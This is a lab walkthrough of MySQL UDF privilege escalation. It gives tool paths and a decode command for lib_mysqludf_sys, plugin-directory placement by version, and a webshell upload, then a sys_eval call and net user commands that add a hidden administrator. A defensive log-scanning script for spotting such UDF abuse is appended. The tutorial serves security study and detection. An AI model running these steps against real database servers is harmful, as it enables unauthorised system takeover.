UDF privilege escalation
UDF stands for 'user-defined function'. It is a mechanism for extending MySQL by adding new functions.
- how to get udf file
- Where to put the file to make mysql recognize this function
- What the functions do
- Why this leads to privilege escalation (commands issued through the custom function run directly with administrator privileges)
Prerequisites
- SQL injection with high privileges
- secure_file_priv imposes no restriction
- The plugin directory is writable
Reproduction
Environment: Kali, Windows 7, phpStudy, MySQL 5.5.47
1. UDF location
/usr/share/metasploit-framework/data/exploits/mysql
/usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
The file cannot be used as shipped; it needs to be decoded first:
cd /usr/share/sqlmap/extra/cloak
python3 cloak.py -d -i /usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
2. File path
MySQL < 5.0: the export path is up to you.
5.0 <= MySQL < 5.1: the file must be exported to a system directory of the target server (e.g. system32).
MySQL 5.1 and above: the udf.dll file must be placed in the lib\plugin folder under the MySQL installation directory before custom functions can be created.
select @@basedir;   (then append lib/plugin/ to the returned path)
Tip: pay attention to the MySQL version here.
Here AntSword is used to upload the webshell.
Create the function
create function sys_eval returns string soname 'udf.dll';
select sys_eval('whoami');
Tip: the file name needs to be changed here.
Privilege escalation succeeded; the user is administrator.
net user test test /add
net localgroup administrators test /add
What the functions do
sys_eval executes arbitrary commands and returns the output.
sys_exec executes an arbitrary command and returns the exit code.
sys_get gets an environment variable.
sys_set creates or modifies an environment variable.
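
For defenders, the two statements shown above (registering a function with CREATE FUNCTION ... SONAME, then calling it) are what show up in MySQL query logs. The following is an added example, not part of the original notes: it scans log lines for UDF registration and for calls to the four functions listed above. The log lines are constructed, and the names scan and SAMPLE_LOG are assumptions of this example.

```python
import re

# Function names exported by lib_mysqludf_sys, as listed on this page.
SYS_FUNCS = ("sys_eval", "sys_exec", "sys_get", "sys_set")

# CREATE [AGGREGATE] FUNCTION <name> RETURNS <type> SONAME '<library>'
CREATE_UDF = re.compile(
    r"create\s+(?:aggregate\s+)?function\s+`?(\w+)`?\s+returns\s+"
    r"(?:string|integer|real|decimal)\s+soname\s+['\"]([^'\"]+)['\"]",
    re.IGNORECASE,
)
# A call to one of the known functions: name followed by an opening parenthesis.
CALL_UDF = re.compile(r"\b(%s)\s*\(" % "|".join(SYS_FUNCS), re.IGNORECASE)


def scan(lines):
    """Return (line_no, kind, detail) for every UDF registration or call."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = CREATE_UDF.search(line)
        if m:
            # Any library-backed function registration is worth reviewing,
            # whatever name it was given.
            detail = "%s <- %s" % (m.group(1), m.group(2))
            findings.append((no, "udf_registered", detail))
            continue
        for m in CALL_UDF.finditer(line):
            findings.append((no, "udf_called", m.group(1).lower()))
    return findings


# Constructed sample in the style of a MySQL general query log.
SAMPLE_LOG = """\
200101 10:00:01    7 Connect   root@localhost on
200101 10:00:02    7 Query     select @@basedir
200101 10:00:05    7 Query     CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll'
200101 10:00:09    7 Query     select sys_eval('whoami')
200101 10:00:12    8 Query     select name from products where id = 3
""".splitlines()

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The registration pattern matches on the SONAME clause rather than the function name, so a renamed function is still reported when it is created; the call pattern only covers the four names listed above.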